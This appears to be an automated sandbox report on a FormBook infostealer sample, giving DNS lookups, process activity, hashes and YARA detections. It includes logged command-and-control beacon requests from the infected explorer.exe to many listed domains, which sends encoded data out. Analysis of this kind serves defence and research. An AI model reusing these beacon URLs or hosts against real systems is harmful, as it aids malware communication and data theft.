                                                                                                                        Jun 16, 2021 11:56:51.648000956 CEST8.8.8.8192.168.2.50x11e1No error (0)www.vicdux.lifepixie.porkbun.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:56:51.648000956 CEST8.8.8.8192.168.2.50x11e1No error (0)pixie.porkbun.com44.227.65.245A (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:56:51.648000956 CEST8.8.8.8192.168.2.50x11e1No error (0)pixie.porkbun.com44.227.76.166A (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:56:57.677643061 CEST8.8.8.8192.168.2.50xc140No error (0)www.lippocaritahotel.comlippocaritahotel.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:56:57.677643061 CEST8.8.8.8192.168.2.50xc140No error (0)lippocaritahotel.com103.28.148.178A (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:57:03.516789913 CEST8.8.8.8192.168.2.50xb8cName error (3)www.saddletaxweigh.infononenoneA (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:57:08.598931074 CEST8.8.8.8192.168.2.50xbad9No error (0)www.sitedesing.com172.67.193.107A (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:57:08.598931074 CEST8.8.8.8192.168.2.50xbad9No error (0)www.sitedesing.com104.21.65.220A (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:57:18.857973099 CEST8.8.8.8192.168.2.50xaae6No error (0)www.themiamadison.comthemiamadison.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:57:18.857973099 CEST8.8.8.8192.168.2.50xaae6No error (0)themiamadison.com192.0.78.24A (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:57:18.857973099 CEST8.8.8.8192.168.2.50xaae6No error (0)themiamadison.com192.0.78.25A (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:57:24.191294909 CEST8.8.8.8192.168.2.50xb48cName error (3)www.yorkshirebridalmakeup.infononenoneA (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:57:29.276146889 CEST8.8.8.8192.168.2.50x7ebaNo error (0)www.influenced-brands.cominfluenced-brands.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:57:29.276146889 CEST8.8.8.8192.168.2.50x7ebaNo error (0)influenced-brands.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:57:34.539542913 CEST8.8.8.8192.168.2.50x78afNo error (0)www.angrybird23blog.com104.252.53.222A (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:57:40.319406033 CEST8.8.8.8192.168.2.50x6b2bName error (3)www.therios.netnonenoneA (IP address)IN (0x0001)

                                                                                                                        HTTP Request Dependency Graph

                                                                                                                        • www.jiltedowl.com
                                                                                                                        • www.slingshotart.com
                                                                                                                        • www.venturivasiljevic.com
                                                                                                                        • www.helpushelpothersstore.com
                                                                                                                        • www.vicdux.life
                                                                                                                        • www.lippocaritahotel.com
                                                                                                                        • www.sitedesing.com
                                                                                                                        • www.themiamadison.com
                                                                                                                        • www.influenced-brands.com

                                                                                                                        HTTP Packets

                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        0192.168.2.54972434.102.136.18080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 16, 2021 11:56:24.730427027 CEST1351OUTGET /um8e/?4h=KKIQ4+/JXGLy+NPKOmU9hT636Guj5rKZNfTWQVYkTfV7RhYYbHnV1SAJBWZXUUxQase4&z6AhC6=4h0836-hg HTTP/1.1
                                                                                                                        Host: www.jiltedowl.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 16, 2021 11:56:24.869313002 CEST1351INHTTP/1.1 403 Forbidden
                                                                                                                        Server: openresty
                                                                                                                        Date: Wed, 16 Jun 2021 09:56:24 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 275
                                                                                                                        ETag: "60c7be47-113"
                                                                                                                        Via: 1.1 google
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        1192.168.2.54972534.102.136.18080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 16, 2021 11:56:35.094669104 CEST1352OUTGET /um8e/?4h=+OafPWEw6Z0Z/R6BCooy8AJa5dJFYQpN1/QWnuYdhiYhG0yayK8Tfl0bClCAF0vxrCxk&z6AhC6=4h0836-hg HTTP/1.1
                                                                                                                        Host: www.slingshotart.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 16, 2021 11:56:35.233381033 CEST1353INHTTP/1.1 403 Forbidden
                                                                                                                        Server: openresty
                                                                                                                        Date: Wed, 16 Jun 2021 09:56:35 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 275
                                                                                                                        ETag: "60c7be47-113"
                                                                                                                        Via: 1.1 google
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        2192.168.2.549726154.216.127.21480C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 16, 2021 11:56:40.636791945 CEST1354OUTGET /um8e/?4h=Yr1O9d2lyD9rL0BsR5AOXBjd9Tt7L5u6HmDWn6NeMbq+6FaKs7VlSuQ+xmgdPYl8Ubqc&z6AhC6=4h0836-hg HTTP/1.1
                                                                                                                        Host: www.venturivasiljevic.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        3192.168.2.549727100.24.208.9780C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 16, 2021 11:56:46.288027048 CEST1355OUTGET /um8e/?4h=Xi9PH5iXPg7OqoK0h1gN6IvgnIc5gotQ/5tv039xv1j+fqecGtXMWbrdMdu22zA2SdJt&z6AhC6=4h0836-hg HTTP/1.1
                                                                                                                        Host: www.helpushelpothersstore.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 16, 2021 11:56:46.451286077 CEST1355INHTTP/1.1 403 Forbidden
                                                                                                                        Server: nginx
                                                                                                                        Date: Wed, 16 Jun 2021 09:56:46 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 146
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        4192.168.2.54972844.227.65.24580C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 16, 2021 11:56:52.072431087 CEST1356OUTGET /um8e/?4h=xbMoviQlEnjsHrEbTPTiLAbjABxJdIVdbR0FO8anDWX5sWiRIQHIKvYrn6XTqKSl/tf+&z6AhC6=4h0836-hg HTTP/1.1
                                                                                                                        Host: www.vicdux.life
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 16, 2021 11:56:52.284991026 CEST1356INHTTP/1.1 307 Temporary Redirect
                                                                                                                        Server: openresty
                                                                                                                        Date: Wed, 16 Jun 2021 09:56:52 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Content-Length: 168
                                                                                                                        Connection: close
                                                                                                                        Location: http://vicdux.life
                                                                                                                        X-Frame-Options: sameorigin
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        5192.168.2.549730103.28.148.17880C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 16, 2021 11:56:57.887948036 CEST1374OUTGET /um8e/?4h=jQU7CxI2ATQsp+gAQw0922hAeD0Z0/nKIEFQeuBuNEOev1XtQ7gaXUtk4Kl0GHqLnKhz&z6AhC6=4h0836-hg HTTP/1.1
                                                                                                                        Host: www.lippocaritahotel.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 16, 2021 11:56:58.096405029 CEST1374INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.21.0
                                                                                                                        Date: Wed, 16 Jun 2021 09:56:58 GMT
                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                        Content-Length: 315
                                                                                                                        Connection: close


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        6192.168.2.549737172.67.193.10780C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 16, 2021 11:57:08.644377947 CEST5377OUTGET /um8e/?4h=5AA2OBt9f+luPmvaEKU5k+Cesx0roAkoENQvosg49Q0qMzSHjZ+2qPqQ9q6NL9KFhBoB&z6AhC6=4h0836-hg HTTP/1.1
                                                                                                                        Host: www.sitedesing.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 16, 2021 11:57:08.744154930 CEST5379INHTTP/1.1 404 Not Found
                                                                                                                        Date: Wed, 16 Jun 2021 09:57:08 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Last-Modified: Tue, 22 Sep 2020 00:47:24 GMT
                                                                                                                        x-amz-version-id: null
                                                                                                                        X-Cache: Error from cloudfront
                                                                                                                        Via: 1.1 fb8c0300277bd0137c1693d3d64ab550.cloudfront.net (CloudFront)
                                                                                                                        X-Amz-Cf-Pop: FRA50-C1
                                                                                                                        X-Amz-Cf-Id: y9aojRlOqPw51h2tNIfa6ozwR6F_DTB1fNB2CWsR6HITn9EpjEkrwQ==
                                                                                                                        Age: 18063
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        cf-request-id: 0ab5d9e3c70000d711e2127000000001
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=tRq780vLZfpBHc1FT%2FJtQ8HMtc4gG5nzmFAyFtMd1eu3K3El1%2BYfYRZrCVsQk4e2CIyFaIoWsPI8bjSweqTWMkZuf4wkU%2Br1vZP9YTUWSw%2BUsD7ige3QsLJvh%2BRjAnU9"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 66032c193c94d711-FRA
                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                        Data Raw: 31 63 36 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 73 69 74 65 64 65 73 69 6e 67 2e 63 6f 6d 2f 34 30 34 2f 22 3e 20 0d 0a 0d 0a 0d 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 73 69 74 65 64 65 73 69 6e 67 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 41 73 73 65 74 20 31 35 35 37 40 33 78 2e 70 6e 67 22 3e 0d 0a 0d 0a 0d 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 27 6f 67 3a 74 69 74 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 48 75 6d 61 6e 69 74 61 61 72 69 73 65 6e 20 61 76 75 6e 20 6d 61 61 69 6c 6d 61 61 6e 20 73 75 6b 65 6c 74 61 76 61 20 62 6c 6f 67 69 22 3e 0d 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 72 74 69 63 6c 65 22 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e
                                                                                                                        Data Ascii: 1c66<!DOCTYPE html><html lang="en"> <head> <meta property="og:url" content="http://sitedesing.com/404/"> <meta property="og:image" content="http://sitedesing.com/images/Asset 1557@3x.png"><meta property='og:title' content="404 Page not found - Humanitaarisen avun maailmaan sukeltava blogi"><meta property="og:type" content="article"> <link rel="canon


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        7192.168.2.549738192.0.78.2480C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 16, 2021 11:57:18.902817965 CEST5387OUTGET /um8e/?4h=NkJAbAW12eli3K5LHnKsR+Euvd9TZZ9XHnn7bgS23Br3geXrqL1EBTSK/IXVH0nBwn3R&z6AhC6=4h0836-hg HTTP/1.1
                                                                                                                        Host: www.themiamadison.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 16, 2021 11:57:18.944828033 CEST5388INHTTP/1.1 301 Moved Permanently
                                                                                                                        Server: nginx
                                                                                                                        Date: Wed, 16 Jun 2021 09:57:18 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 162
                                                                                                                        Connection: close
                                                                                                                        Location: https://www.themiamadison.com/um8e/?4h=NkJAbAW12eli3K5LHnKsR+Euvd9TZZ9XHnn7bgS23Br3geXrqL1EBTSK/IXVH0nBwn3R&z6AhC6=4h0836-hg
                                                                                                                        X-ac: 2.hhn _dca
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        8192.168.2.54973934.102.136.18080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 16, 2021 11:57:29.320394993 CEST5389OUTGET /um8e/?4h=OS+4PEF1Ll0k0ag4LLFRlEV4qtlkwOP7xXHx1u8kCQ7qmPGCq8FzaBf5dHjLd1oRWXdL&z6AhC6=4h0836-hg HTTP/1.1
                                                                                                                        Host: www.influenced-brands.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 16, 2021 11:57:29.460119009 CEST5389INHTTP/1.1 403 Forbidden
                                                                                                                        Server: openresty
                                                                                                                        Date: Wed, 16 Jun 2021 09:57:29 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 275
                                                                                                                        ETag: "60c7be47-113"
                                                                                                                        Via: 1.1 google
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                        Code Manipulations

                                                                                                                        Statistics

                                                                                                                        Behavior

                                                                                                                        Click to jump to process

                                                                                                                        System Behavior

                                                                                                                        Analysis Process: RFQ-BCM 03122020.exe PID: 4628 Parent PID: 5752

                                                                                                                        General

                                                                                                                        Start time:11:55:27
                                                                                                                        Start date:16/06/2021
                                                                                                                        Path:C:\Users\user\Desktop\RFQ-BCM 03122020.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:'C:\Users\user\Desktop\RFQ-BCM 03122020.exe'
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:222795 bytes
                                                                                                                        MD5 hash:D3D5E6CAFA8CA89384E56E6374A14203
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.257817339.0000000002160000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.257817339.0000000002160000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.257817339.0000000002160000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:low

                                                                                                                        Analysis Process: RFQ-BCM 03122020.exe PID: 5988 Parent PID: 4628

                                                                                                                        General

                                                                                                                        Start time:11:55:27
                                                                                                                        Start date:16/06/2021
                                                                                                                        Path:C:\Users\user\Desktop\RFQ-BCM 03122020.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:'C:\Users\user\Desktop\RFQ-BCM 03122020.exe'
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:222795 bytes
                                                                                                                        MD5 hash:D3D5E6CAFA8CA89384E56E6374A14203
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.304999072.00000000006A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.304999072.00000000006A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.304999072.00000000006A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.254539209.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.254539209.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.254539209.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.304861461.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.304861461.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.304861461.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.305023643.00000000006D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.305023643.00000000006D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.305023643.00000000006D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:low

                                                                                                                        Analysis Process: explorer.exe PID: 3472 Parent PID: 5988

                                                                                                                        General

                                                                                                                        Start time:11:55:33
                                                                                                                        Start date:16/06/2021
                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                                        Imagebase:0x7ff693d90000
                                                                                                                        File size:3933184 bytes
                                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Analysis Process: chkdsk.exe PID: 3536 Parent PID: 3472

                                                                                                                        General

                                                                                                                        Start time:11:55:50
                                                                                                                        Start date:16/06/2021
                                                                                                                        Path:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                                        Imagebase:0x200000
                                                                                                                        File size:23040 bytes
                                                                                                                        MD5 hash:2D5A2497CB57C374B3AE3080FF9186FB
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.517835626.00000000047A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.517835626.00000000047A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.517835626.00000000047A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
